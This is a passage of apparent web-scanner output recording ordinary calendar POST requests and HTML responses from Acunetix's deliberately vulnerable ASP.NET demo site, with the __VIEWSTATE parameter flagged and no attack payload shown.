Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8225&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAhvc9YdoIZGRkNub5RNTaIgYO0eibGMz7eKtQB3w%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK6k%2FyFBgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2B%2BZVE21LWuG3jehUmlJJdH20BkDw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:06 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAhvc9YdoIZGRkNub5RNTaIgYO0eibGMz7eKtQB3w=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK6k/yFBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q++ZVE21LWuG3jehUmlJJdH20BkDw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:White" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8213&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAkfrPV9oIZGRk4Icj9k5ViAEUS1NJZL9Rv9zHijI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLu6vOlDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bsy0BrMJSvbwxK2uadXn02LfDfHw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:28 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAkfrPV9oIZGRk4Icj9k5ViAEUS1NJZL9Rv9zHijI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLu6vOlDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+sy0BrMJSvbwxK2uadXn02LfDfHw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:White" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
